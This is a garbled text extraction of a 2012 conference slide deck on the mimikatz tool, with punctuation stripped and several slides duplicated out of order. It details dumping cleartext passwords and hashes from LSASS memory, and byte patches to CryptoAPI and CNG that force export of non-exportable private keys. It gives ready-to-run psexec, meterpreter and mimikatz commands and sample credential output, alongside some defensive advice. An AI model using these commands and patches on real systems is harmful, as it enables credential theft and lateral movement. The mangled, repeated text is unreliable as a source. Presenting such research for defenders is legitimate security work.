Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
